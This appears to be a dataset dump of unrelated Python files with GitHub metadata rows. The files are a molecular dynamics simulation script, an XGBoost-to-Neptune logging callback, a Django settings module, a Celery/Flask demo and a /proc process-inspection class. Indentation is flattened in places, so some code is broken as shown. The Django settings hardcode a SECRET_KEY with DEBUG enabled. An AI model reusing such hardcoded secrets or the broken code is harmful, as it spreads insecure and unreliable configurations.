yukawa.pair_coeff.set(['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'], epsilon=0, kappa=0, r_cut=0, r_on=0)
yukawa.pair_coeff.set('P', 'P', epsilon=yukawaPrefactor, kappa=kappa, r_cut=rc, r_on=ron)
#### NOW RUN POLYMER + CPS WITHOUT ANY ATTRACTIVE INTERACTIONS
#### TO GET THE SYSTEM INTO A MORE REASONABLE
#### CONFIGURATION
# Set the integrator
ts = float(config['Time Step Length'])
if start == 1:
firepoly = md.integrate.mode_minimize_fire(dt=ts*0.1, ftol=1e-2, Etol=1e-7)
nve = md.integrate.nve(group=nonrigid)
#while not(firepoly.has_converged()):
# run(100)
run(5000)
nve.disable()
del nve
imode = md.integrate.mode_standard(dt=ts,aniso=True)
langevin = md.integrate.langevin(group=integrableparts, kT=1.0, seed=seed, dscale=1.0)
anim_period = 100000.0/ts
dcd = dump.dcd(filename="sd%s.dcd" % seed, period = anim_period*0.025)
run(50000000)
langevin.disable()
del langevin #hoomd complains if you simply disable the integrator
###TURN ON INTERACTIONS
morse.pair_coeff.set('A1','A1',D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set('A2','A2',D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set('A3','A5',D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set('A4','A6',D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
#Pentameric
morse.pair_coeff.set(['A1B'],['A1B'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A2B'],['A2B'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A3B'],['A5B'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A4B'],['A6B'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
#Hexameric
#there is no A1C...
morse.pair_coeff.set(['A1A'],['A1B'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A2A'],['A2C'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A3A'],['A5C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A4A'],['A6C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A5A'],['A3C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A6A'],['A4C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
#yukawa
yukawa.pair_coeff.set('Q', 'Q', epsilon=yukawaPrefactor*chargeQ**2, kappa=kappa, r_cut=rc, r_on=ron)
#yukawa.pair_coeff.set('P', 'P', epsilon=yukawaPrefactor, kappa=kappa, r_cut=rc, r_on=ron)
yukawa.pair_coeff.set('P', 'Q', epsilon=-yukawaPrefactor*chargeQ, kappa=kappa, r_cut=rc, r_on=ron)
imode = md.integrate.mode_standard(dt=ts,aniso=True)
langevin = md.integrate.langevin(group=integrableparts, kT=1.0, seed=seed, dscale=1.0)
if start != 1:
anim_period = 100000.0/ts
dcd = dump.dcd(filename="sd%s.dcd" % seed, period = anim_period*0.025)
logger = analyze.log(filename="sd%s.log" % seed, quantities=['temperature', 'potential_energy'], period=anim_period)
if start==1:
gsd_restart = dump.gsd(filename='sd%s_a.gsd' % seed, truncate=True, group=group.all(),period = anim_period , phase=0)
else:
gsd_restart1 = dump.gsd(filename='sd%s_a.gsd' % seed, truncate=True, group=group.all(), period = anim_period , phase=0)
gsd_restart2 = dump.gsd(filename='sd%s_b.gsd' % seed, truncate=True, group=group.all(),period = anim_period , phase=0)
runlen = anim_period*20
#runlen = anim_period*10
run(runlen, limit_hours=59.9, limit_multiple=10)
#run(runlen)
| [
"noreply@github.com"
] | jaeilpark.noreply@github.com |
b79a7c32659f9b274e5ad14de8849e7081c53df2 | f28da6013fa8982154a9bcf095fe24931542bfc4 | /tests/python_output/output_sample_3.py | 66698bc023fff2134a74b22811f424ae3fc6c60e | [
"MIT"
] | permissive | aeroshev/CMP | f27419e12e84ec7d1a76475312321d2435158f05 | f4366972dfd752833094920728e4ce11ee58feae | refs/heads/main | 2023-05-08T11:47:52.760928 | 2021-06-05T08:09:47 | 2021-06-05T08:09:47 | 345,696,153 | 0 | 0 | MIT | 2021-05-21T12:39:52 | 2021-03-08T15:08:16 | Python | UTF-8 | Python | false | false | 92 | py | import numpy as np
def stat(x):
n = x + x
m = n + x
s = m + n
return m, s
| [
"aeroshev@mail.ru"
] | aeroshev@mail.ru |
08fb4bda39217af3d3c3ebd272ab70ae0df1799a | 5e19d70c96351bfe62b0269935dabc90e3fa42b6 | /neptunecontrib/monitoring/xgboost_monitor.py | 2105c42c5f829c125db04d0475d0edd58f95574d | [
"MIT"
] | permissive | harupy/neptune-contrib | fd9cff6dd5809b010b77f4641d3e792697e63e4d | 31549483b8deff78b9630d491b3ba716a9396c31 | refs/heads/master | 2022-06-24T05:35:47.186628 | 2020-04-17T09:45:24 | 2020-04-17T09:45:24 | 262,730,503 | 0 | 0 | MIT | 2020-05-11T12:18:11 | 2020-05-10T06:59:52 | null | UTF-8 | Python | false | false | 10,882 | py | #
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import tempfile
import neptune
import xgboost as xgb
def neptune_callback(log_model=True,
log_importance=True,
max_num_features=None,
log_tree=(0,),
experiment=None,
**kwargs):
"""XGBoost callback for Neptune experiments.
This is XGBoost callback that automatically logs training and evaluation metrics, feature importance chart,
visualized trees and trained Booster to Neptune.
Check Neptune documentation for the `full example <https://docs.neptune.ai/integrations/xgboost.html>`_.
Make sure you created an experiment before you start XGBoost training using ``neptune.create_experiment()``
(`check our docs <https://docs.neptune.ai/neptune-client/docs/project.html
#neptune.projects.Project.create_experiment>`_).
Integration works with ``xgboost>=0.82``.
Tip:
Use this `Google Colab <https://colab.research.google.com/github/neptune-ai/neptune-colab-examples
/blob/master/xgboost-integration.ipynb>`_ to try it without further ado.
Args:
log_model (:obj:`bool`, optional, default is ``True``):
| Log booster to Neptune after last boosting iteration.
| If you run xgb.cv, log booster for all folds.
log_importance (:obj:`bool`, optional, default is ``True``):
| Log feature importance to Neptune as image after last boosting iteration.
| Specify number of features using ``max_num_features`` parameter below.
| If you run xgb.cv, log feature importance for each folds' booster.
max_num_features (:obj:`int`, optional, default is ``None``):
| Plot top ``max_num_features`` features on the importance plot.
| If ``None``, plot all features.
log_tree (:obj:`list` of :obj:`int`, optional, default is ``[1,]``):
| Log specified trees to Neptune as images after last boosting iteration.
| If you run xgb.cv, log specified trees for each folds' booster.
| Default is to log first tree.
| If ``None``, do not log any tree.
experiment (:obj:`neptune.experiments.Experiment`, optional, default is ``None``):
| For advanced users only. Pass Neptune
`Experiment <https://docs.neptune.ai/neptune-client/docs/experiment.html#neptune.experiments.Experiment>`_
object if you want to control to which experiment data is logged.
| If ``None``, log to currently active, and most recent experiment.
kwargs:
Parametrize XGBoost functions used in this callback:
`xgboost.plot_importance <https://xgboost.readthedocs.io/en/latest/python/python_api.html
?highlight=plot_tree#xgboost.plot_importance>`_
and `xgboost.to_graphviz <https://xgboost.readthedocs.io/en/latest/python/python_api.html
?highlight=plot_tree#xgboost.to_graphviz>`_.
Returns:
:obj:`callback`, function that you can pass directly to the XGBoost callbacks list, for example to the
``xgboost.cv()``
(`see docs <https://xgboost.readthedocs.io/en/latest/python/python_api.html?highlight=plot_tree#xgboost.cv>`_)
or ``XGBClassifier.fit()``
(`check docs <https://xgboost.readthedocs.io/en/latest/python/python_api.html?highlight=plot_tree
#xgboost.XGBClassifier.fit>`_).
Note:
If you use early stopping, make sure to log model, feature importance and trees on your own.
Neptune logs these artifacts only after last iteration, which you may not reach because of early stop.
Examples:
``xgb.train`` examples
.. code:: python3
# basic usage
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[neptune_callback()])
# do not log model
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[neptune_callback(log_model=False)])
# log top 5 features' importance chart
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[neptune_callback(max_num_features=5)])
``xgb.cv`` examples
.. code:: python3
# log 5 trees per each folds' booster
xgb.cv(param, dtrain, num_boost_round=num_round, nfold=7,
callbacks=neptune_callback(log_tree=[0,1,2,3,4]))
# log only metrics
xgb.cv(param, dtrain, num_boost_round=num_round, nfold=7,
callbacks=[neptune_callback(log_model=False,
log_importance=False,
max_num_features=None,
log_tree=None)])
# log top 5 features per each folds' booster
xgb.cv(param, dtrain, num_boost_round=num_round, nfold=7,
callbacks=[neptune_callback(log_model=False,
max_num_features=3,
log_tree=None)])
``sklearn`` API examples
.. code:: python3
# basic usage with early stopping
xgb.XGBRegressor().fit(X_train, y_train,
early_stopping_rounds=10,
eval_metric=['mae', 'rmse', 'rmsle'],
eval_set=[(X_test, y_test)],
callbacks=[neptune_callback()])
# do not log model
clf = xgb.XGBRegressor()
clf.fit(X_train, y_train,
eval_metric=['mae', 'rmse', 'rmsle'],
eval_set=[(X_test, y_test)],
callbacks=[neptune_callback(log_model=False)])
y_pred = clf.predict(X_test)
# log 8 trees
reg = xgb.XGBRegressor(**params)
reg.fit(X_train, y_train,
eval_metric=['mae', 'rmse', 'rmsle'],
eval_set=[(X_test, y_test)],
callbacks=[neptune_callback(log_tree=[0,1,2,3,4,5,6,7])])
"""
if experiment:
_exp = experiment
else:
try:
neptune.get_experiment()
_exp = neptune
except neptune.exceptions.NoExperimentContext:
msg = 'No currently running Neptune experiment. \n'\
'To start logging to Neptune create experiment by using: `neptune.create_experiment()`. \n'\
'More info in the documentation: '\
'<https://docs.neptune.ai/neptune-client/docs/project.html' \
'#neptune.projects.Project.create_experiment>.'
raise neptune.exceptions.NeptuneException(msg)
assert isinstance(log_model, bool),\
'log_model must be bool, got {} instead. Check log_model parameter.'.format(type(log_model))
assert isinstance(log_importance, bool),\
'log_importance must be bool, got {} instead. Check log_importance parameter.'.format(type(log_importance))
if max_num_features is not None:
assert isinstance(max_num_features, int),\
'max_num_features must be int, got {} instead. ' \
'Check max_num_features parameter.'.format(type(max_num_features))
if log_tree is not None:
if isinstance(log_tree, tuple):
log_tree = list(log_tree)
assert isinstance(log_tree, list),\
'log_tree must be list of int, got {} instead. Check log_tree parameter.'.format(type(log_tree))
def callback(env):
# Log metrics after iteration
for item in env.evaluation_result_list:
if len(item) == 2: # train case
_exp.log_metric(item[0], item[1])
if len(item) == 3: # cv case
_exp.log_metric('{}-mean'.format(item[0]), item[1])
_exp.log_metric('{}-std'.format(item[0]), item[2])
# Log booster, end of training
if env.iteration + 1 == env.end_iteration and log_model:
if env.cvfolds: # cv case
for i, cvpack in enumerate(env.cvfolds):
_log_model(cvpack.bst, 'cv-fold-{}-bst.model'.format(i), _exp)
else: # train case
_log_model(env.model, 'bst.model', _exp)
# Log feature importance, end of training
if env.iteration + 1 == env.end_iteration and log_importance:
if env.cvfolds: # cv case
for i, cvpack in enumerate(env.cvfolds):
_log_importance(cvpack.bst, max_num_features, _exp, title='cv-fold-{}'.format(i), **kwargs)
else: # train case
_log_importance(env.model, max_num_features, _exp, **kwargs)
# Log trees, end of training
if env.iteration + 1 == env.end_iteration and log_tree:
if env.cvfolds:
for j, cvpack in enumerate(env.cvfolds):
_log_trees(cvpack.bst, log_tree, 'trees-cv-fold-{}'.format(j), _exp, **kwargs)
else:
_log_trees(env.model, log_tree, 'trees', _exp, **kwargs)
return callback
def _log_model(booster, name, npt):
with tempfile.TemporaryDirectory(dir='.') as d:
path = os.path.join(d, name)
booster.save_model(path)
npt.log_artifact(path)
def _log_importance(booster, max_num_features, npt, **kwargs):
try:
import matplotlib.pyplot as plt
except ImportError:
raise ImportError('Please install matplotlib to log importance')
importance = xgb.plot_importance(booster, max_num_features=max_num_features, **kwargs)
npt.log_image('feature_importance', importance.figure)
plt.close('all')
def _log_trees(booster, tree_list, img_name, npt, **kwargs):
with tempfile.TemporaryDirectory(dir='.') as d:
for i in tree_list:
file_name = 'tree_{}'.format(i)
tree = xgb.to_graphviz(booster=booster, num_trees=i, **kwargs)
tree.render(filename=file_name, directory=d, view=False, format='png')
npt.log_image(img_name,
os.path.join(d, '{}.png'.format(file_name)),
image_name=file_name)
| [
"noreply@github.com"
] | harupy.noreply@github.com |
9d2e2e509a635d8d7698a89d4e4b939dbc77cb36 | 7591c267059486c943d68e713bd3ff338900d2c5 | /settings.py | 5a2d36ae53de4e39a3fb123b6c4885d77b2de18b | [] | no_license | westinedu/quanenta | 00fe419da1e34ddd9001ffeb9848639d5c58d265 | a59c75458b6eff186637ab8e0e36b6f68a1a99c9 | refs/heads/master | 2021-01-10T20:35:25.196907 | 2012-06-07T06:01:33 | 2012-06-07T06:01:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 846 | py | try:
from djangoappengine.settings_base import *
has_djangoappengine = True
except ImportError:
has_djangoappengine = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
import os
SECRET_KEY = '=r-$b*8hglm+858&9t043hlm6-&6-3d3vfc4((7yd0dbrakhvi'
INSTALLED_APPS = (
'djangotoolbox',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'core',
)
if has_djangoappengine:
INSTALLED_APPS = ('djangoappengine',) + INSTALLED_APPS
TEST_RUNNER = 'djangotoolbox.test.CapturingTestSuiteRunner'
ADMIN_MEDIA_PREFIX = '/media/admin/'
MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), 'templates'),)
LOGIN_URL = '/login/'
LOGOUT_URL = '/logout/'
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'urls'
| [
"westine@gmail.com"
] | westine@gmail.com |
6247fa905c62f65ef2abaac9127d1e723497625f | b49540e24817b06c28d0cce94ced88af96cb19cb | /Draft 8/run.py | 63c090c7d28c62a75be0834042aeebd347fd402a | [] | no_license | turtlelovesshoes/Social-Metrics | 129610dfa8c78eb7bc0483d834d14e9c087334ea | 929f87a958b206353ec83babb723f06cd66d88ed | refs/heads/master | 2020-03-25T21:56:36.304651 | 2018-11-13T22:24:18 | 2018-11-13T22:24:18 | 144,196,300 | 0 | 0 | null | 2018-09-05T23:54:00 | 2018-08-09T19:41:48 | Python | UTF-8 | Python | false | false | 2,701 | py | # plot 3 data sets by week and by tags
# sort
#Count
#Create new data structure for each tag association
#plot
#plot bins and range
#plot product and
# compare weekly a nd plotlanguage seperatly by numbers of volume
#plot user issue from week to week
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
def main():
#add arugment speficies which commandline options, in this case -f is the input file
parser = argparse.ArgumentParser(description='Read the end of a file')
parser.add_argument('-f', action="store", dest="input_file",
help='this is the filename and path argument')
parser.add_argument('-2f', action="store", dest="second_input_file",
help='this is the filename and path argument of the second data to compare')
parser.add_argument('-3f', action="store", dest="third_input_file",
help='this is the filename and path argument of the second data to compare')
#parser.add_argument('-s', action="store", dest="support_tag_file",
#help='this is the filename and path argument for the support tags')
#parser.add_argument('-p', action="store", dest="product_tag_file",
#help='this is the filename and path argument for the product tags')
#parser.add_argument('-t', action="store", dest="trending_tag_file",
# help='this is the filename and path argument for the trending support tags')
#parser.add_argument('-t', action='store', dest="trending_tag_file", default=None, help="new tags created this release",)
#this one should be optional
#parser.add_argument('-l', action="store", dest="language_tag_file",
# help='this is the filename and path argument for the language tags')
args = parser.parse_args()
#read csvs into nps
week_1 = np.genfromtxt(args.input_file, delimiter = ',')
week_2 = np.genfromtxt(args.second_input_file, delimiter = ',')
week_3 = np.genfromtxt(args.third_input_file, delimiter = ',')
## clean file should be: text, tags(not), locale, conver date
#now what do we do with each of them?
#later create column with positive/negative
print(week_1)
#date gives histogram tag over time
#language gives sorting data
#tag user category gives pivot of sub language
## sort
#Count
#Create new data structure for each tag association
#plot
#plot bins and range - histogram
#plot product - need product txt list
# compare weekly a nd plotlanguage seperatly by numbers of volume
#plot user issue from week to week
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | turtlelovesshoes.noreply@github.com |
27c7d4c198a7b401ca4add37d149c61f3f7e6ebf | 4ea23c1565669386424bd9844ab1de4a26e579d8 | /Exam2_advancedphyton/Q8_finally.py | 399934153e65d2ec25ae73187ea4a6af82d925e8 | [] | no_license | Jishasudheer/phytoncourse | bf0ce8b137c66921c4a98e6b17a74467773baebd | 9c222a3d0a6dd220f69bb344d27ef97154f55d4f | refs/heads/master | 2023-08-31T15:16:26.048596 | 2021-09-16T02:13:10 | 2021-09-16T02:13:10 | 406,445,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | #With error
lst=[8,5,6,9]
try:
print(lst[6])
except:
print("Error occured")
finally:
print("printing finally block")
#without error
lst = [8, 5, 6, 9]
try:
print(lst[2])
except:
print("Error occured")
finally:
print("printing finally block")
| [
"jjishasudheer@gmail.com"
] | jjishasudheer@gmail.com |
06c9b08bec59de708afb24c62c1d6cb182b1548d | cd188cce671fdf1abc3c4e6c8a9d084fa31e502f | /1010-1027 [입출력]/1026.py | 3ca637f6c4b89c5c773803460473d25e456e5bbb | [] | no_license | mjn9ine/codeup-algorithm | 12c6736f680b172e5129f8db50fd775117fe62af | 46e8bd439239a88c00b8dd4d66d7ec0f22805ecd | refs/heads/master | 2023-02-09T02:09:34.477462 | 2021-01-03T08:46:09 | 2021-01-03T08:46:09 | 325,907,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | h, m, s = input().split(':')
print(int(m)) | [
"mjn9ine@gmail.com"
] | mjn9ine@gmail.com |
fa6731a06ce9098c9172e774cfce8c277c87accb | 1e9dd1a7a14b3e1c2fef9d20f6b5a81535176721 | /login.py | 3b39824d0bcc45428b92582be1d7fc722d6330ed | [] | no_license | ryedunn/Password-Generator | e386a7e306953a6ebd2399e91399f0f39234c10d | 89c7df836036d994e17463414a1d1abe87710a8b | refs/heads/main | 2023-07-22T14:29:50.774079 | 2021-08-31T16:35:47 | 2021-08-31T16:35:47 | 397,386,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,624 | py | import tkinter as tk
import registration
def main(parent):
parent = tk.Frame(parent)
Login(parent)
parent.mainloop()
return None
class Login:
def __init__(self, parent, *args, **kwargs):
root = tk.Toplevel()
root.title("User Login")
root.geometry("225x150")
# Main Frame
frame_Main = tk.Frame(root)
frame_Main.pack()
self.lbl_Username = tk.Label(
frame_Main,
text="Username:",
).pack()
username_login_entry = tk.Entry(
frame_Main,
textvariable="123",
)
username_login_entry.pack()
self.lbl_Password = tk.Label(
frame_Main,
text="Password:",
).pack()
password_login_entry = tk.Entry(
frame_Main,
textvariable="456",
show="*",
)
password_login_entry.pack()
tk.Label(
frame_Main,
text="",
).pack()
self.btn_frame = tk.Frame(frame_Main)
self.btn_frame.pack()
self.btn_Login = tk.Button(
self.btn_frame,
text="Login",
width=5,
bd=3,
)
self.btn_Login.pack(
side=tk.LEFT,
padx=5,
)
# create a register button
self.btn_Register = tk.Button(
self.btn_frame,
text="Register",
width=5,
bd=3,
command=lambda: registration.main(root),
)
self.btn_Register.pack(
side=tk.RIGHT,
padx=5,
)
| [
"ryedunn@hotmail.com"
] | ryedunn@hotmail.com |
c2aa265e2884ec270c925d8c741df379a8df5a79 | 52abd2ccd1435421f756514a23c73843ea301a35 | /recipes/tket-benchmarks/conanfile.py | b5814206e1e41124d0f2d0cd4b35d8f7d4abe395 | [
"Apache-2.0"
] | permissive | qfizik/tket | 51e684db0f56128a71a18a27d6c660908af391cd | f31cbec63be1a0e08f83494ef7dedb8b7c1dafc8 | refs/heads/main | 2023-08-13T01:20:01.937544 | 2021-09-24T08:09:30 | 2021-09-24T08:09:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | # Copyright 2019-2021 Cambridge Quantum Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from conans import ConanFile
class TketBenchmarksConan(ConanFile):
name = "tket-benchmarks"
version = "0.1.0"
requires = "gtest/1.10.0", "benchmark/1.5.1"
# TODO
| [
"alec.edgington@cambridgequantum.com"
] | alec.edgington@cambridgequantum.com |
4e1ee0f644436314a866537f1c3e307cafa91be0 | b93c6069b4025fabc25b2ab69931ff9c7d5c7ef0 | /foo.py | 9edc1840920bf8f99637f59e5b29cc1f4d94b0b7 | [] | no_license | annusachan24/Webapp | 710236f245c8e3c0a70f1024f3af0572e1e186d4 | 083bfefd83a7d9d119142e6d806f5c36d650bfbd | refs/heads/master | 2021-01-12T06:52:57.274335 | 2016-12-19T10:26:08 | 2016-12-19T10:26:08 | 76,851,675 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | import os
import random
import time
from celery import Celery
from flask import Flask, request, render_template, session, flash, redirect,url_for, jsonify
app = Flask(__name__)
# Celery configuration
app.config['CELERY_BROKER_URL'] = 'redis://localhost:6379/0'
app.config['CELERY_RESULT_BACKEND'] = 'redis://localhost:6379/0'
# Initialize Celery
celery = Celery(app.name, broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
@celery.task(bind=True)
def long_task(self,arg1,arg2):
"""Background task that runs a long function with progress reports."""
verb = ['Starting up', 'Booting', 'Repairing', 'Loading', 'Checking']
adjective = ['master', 'radiant', 'silent', 'harmonic', 'fast']
noun = ['solar array', 'particle reshaper', 'cosmic ray', 'orbiter', 'bit']
message = ''
total = random.randint(10, 50)
res=arg1+arg2
for i in range(total):
if not message or random.random() < 0.25:
message = '{0} {1} {2}...'.format(random.choice(verb),
random.choice(adjective),
random.choice(noun))
self.update_state(state='PROGRESS',
meta={'current': i, 'total': total,
'status': message})
time.sleep(1)
return {'current': 100, 'total': 100, 'status': 'Task completed!',
'result':res}
| [
"annusrcm@gmail.com"
] | annusrcm@gmail.com |
0e89a2204c0ef1e2e5b69d37b8818aae7a708562 | b7c2f96934c752b2fa3b6c8ac3f362d7d30a10f2 | /leet3_LongestSubstring.py | d516e69508760562988c1a1445ba845776cb6c03 | [] | no_license | ZhouZoey/LeetCode-python | a6cc13e8a04053bf002076eb5e42914255acd9cc | 3a65cd370055a9315f41a89e10a19e17bd365cc2 | refs/heads/main | 2023-04-25T05:21:34.756057 | 2021-05-13T11:42:43 | 2021-05-13T11:42:43 | 360,368,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | class Solution(object):
def length0fLongestSubstring(self, s: str) -> int:
# 哈希集合,记录每个字符是否出现过
occ = set()
n = len(s)
# 右指针, 初始值为-1, 字符串左边界,还未移动
rk = -1
# 记录长度
ans = 0
for i in range(n):
if i != 0:
# 左指针向右移动一格,移除一个字符
occ.remove(s[i - 1])
while rk + 1 < n and s[rk +1] not in occ:
# 不断移动右指针
occ.add(s[rk + 1])
rk += 1
# 第 i 到 rk 个字符是一个极长的无重复字符串
ans = max(ans, rk - i +1)
return ans
# Hash只用一次遍历
class Solution1(object):
def length0fLongestSubstring(self, s: str) -> int:
k, res, c_dict = -1, 0, {}
for i, c in enumerate(s):
# 重复时
# c_dict > k 一个字符的情况不再继续比较 减少计算
if c in c_dict and c_dict[c] > k:
k = c_dict[c]
c_dict[c] = i
else:
c_dict[c] = i
res = max(res, i - k)
return res
if __name__ == '__main__':
s = "abcabcbb"
sol = Solution1()
w = sol.length0fLongestSubstring(s)
print("The answer is :", w)
| [
"noreply@github.com"
] | ZhouZoey.noreply@github.com |
54c78328c2d9d8feae7f8934077198c8ac87f736 | 4036ed3d566c74db3c9cfce6d292b903ffdfa6af | /MachineProblem3/protest.py | de02c10333cc82aa114ccee56e6eea7e6b5d2b7a | [] | no_license | HighKingOfGondor/CSCE-313 | 189a04709b2aec5e9333caf8adee93535d6e048f | 84961d619ae8e5a96904f207960e8310b1d274d2 | refs/heads/master | 2021-01-19T04:10:52.874147 | 2017-05-30T16:03:28 | 2017-05-30T16:03:28 | 87,355,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,375 | py | import sys
import re
import os
from subprocess import check_output, CalledProcessError
class Proctest(object):
"""
Object to contain process data and getter functions
"""
def __init__(self, pid):
fileStatus = "/proc/" + pid + "/status"
fileStat = "/proc/" + pid + "/stat"
fileStatus1 = fileStatus.strip("\n")
fileStat1 = fileStat.strip("\n")
self.processID = pid
self.status = []
self.uids = []
self.guids = []
with open (fileStatus1, 'r') as f:
self.status = f.read().splitlines()
for line in self.status:
match = re.search(r'\bPpid:\b', line)
if match:
self.ppid = line[line.index(match) + 1]
match = re.search(r'\bUid:\b', line)
if match:
self.uids = line.split()
for line in self.status:
match = re.search(r'\bGid:\b', line)
if match:
self.guids = line.split()
match = re.search(r'\bState:\b', line)
if match:
self.state = line[line.index(match) + 1]
match = re.search(r'\bTgid:\b', line)
if match:
self.tid = line[line.index(match) + 1]
match = re.search(r'\bThreads:\b', line)
if match:
self.threadNum = line[line.index(match) + 1]
self.stat = []
with open (fileStat1, 'r') as f1:
self.stat = f1.read().split()
def getpid(self):
localpid = self.processID
return localpid
def getppid(self):
localppid = self.ppid
return localppid
def geteuid(self):
euid = self.uids[2]
return euid
def getegid(self):
geiud = self.guids[2]
return geiud
def getruid(self):
ruid = self.uids[1]
return ruid
def getrgid(self):
rgid = self.guids[1]
return rgid
def getfsuid(self):
fsuid = self.uids[4]
return fsuid
def getfsgid(self):
fsgid = self.guids[4]
return fsgid
def getstate(self):
localstate = self.state
return localstate
def getthread_count(self):
thread_count = self.threadNum[1]
return thread_count
def getpriority(self):
priority = self.stat[17]
return priority
def getniceness(self):
nice = self.stat[18]
return nice
def getstime(self):
stime = self.stat[14]
return stime
def getutime(self):
utime = self.stat[13]
return utime
def getcstime(self):
cstime = self.stat[16]
return cstime
def getcutime(self):
cutime = self.stat[15]
return cutime
def getstartcode(self):
startTime = self.stat[21]
return startTime
def getendcode(self):
endCode = self.stat[26]
return endCode
def getesp(self):
esp = self.stat[28]
return esp
def geteip(self):
eip = self.stat[29]
return eip
def getfiles(self):
"""
Returns process's current number of open file descriptors
Work needed here!
"""
pass
def getvoluntary_context_switches(self):
"""
Returns the number of times that the process has voluntarily
yielded control to the kernel.
Work needed here!
"""
pass
def getnonvoluntary_context_switches(self):
"""
Returns the number of times that the process has had control
taken from it forcefully by the kernel.
Work needed here!
"""
pass
def getlast_cpu(self):
"""
Returns the last cpu that the process executed on
Work needed here!
"""
pass
def getallowed_cpus(self):
"""
Returns a list of allowed processors
Work needed here!
"""
pass
def getmemory_map(self):
"""
Returns process's memory map
Work needed here!
"""
pass
def main():
# Read in PID
sys.stdout.write("Enter the PID of a process: ")
sys.stdout.flush()
process_pid = sys.stdin.readline()
process_data = Proctest(process_pid)
# Start printing out values
print ""
print "Process Information:"
print " 1) Identifiers"
print " PID: %s" % process_data.getpid()
print " PPID: %s" % process_data.getppid()
print " EUID: %s" % process_data.geteuid()
print " EGID: %s" % process_data.getegid()
print " RUID: %s" % process_data.getruid()
print " RGID: %s" % process_data.getrgid()
print " FSUID: %s" % process_data.getfsuid()
print " FSGID: %s" % process_data.getfsgid()
print ""
print " 2) State"
print " State: %s" % process_data.getstate()
print ""
print " 3) Thread Information"
print " Thread Count: %s" % process_data.getthread_count()
print ""
print " 4) Priority"
print " Priority Number: %s" % process_data.getpriority()
print " Niceness Value: %s" % process_data.getniceness()
print ""
print " 5) Time Information"
print " stime: %s" % process_data.getstime()
print " utime: %s" % process_data.getutime()
print " cstime: %s" % process_data.getcstime()
print " cutime: %s" % process_data.getcutime()
print ""
print " 6) Address Space"
print " Startcode: %s" % process_data.getstartcode()
print " Endcode: %s" % process_data.getendcode()
print " ESP: %s" % process_data.getesp()
print " EIP: %s" % process_data.geteip()
print ""
print " 7) Resources"
print " File Handles: %s" % process_data.getfiles()
print " Voluntary Context Switches: %s" % process_data.getvoluntary_context_switches()
print " Nonvoluntary Context Switches: %s" % process_data.getnonvoluntary_context_switches()
print ""
print " 8) Processor"
print " Last Processor: %s" % process_data.getlast_cpu()
print " Allowed Cores: %s" % process_data.getallowed_cpus()
print ""
print " 9) Memory Map"
temp_mem_array = process_data.getmemory_map()
for line in temp_mem_array:
print " %s" % line
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | HighKingOfGondor.noreply@github.com |
f4a65671dde5f682aab0a747b66e2ba2cdc09f88 | c9d4d4c78703d009da11999e4e59b6a168a454a2 | /examples/Machine Learning In Action/reducer.py | 67e8edacbbd3347055d42c21781c0208b8451281 | [
"MIT"
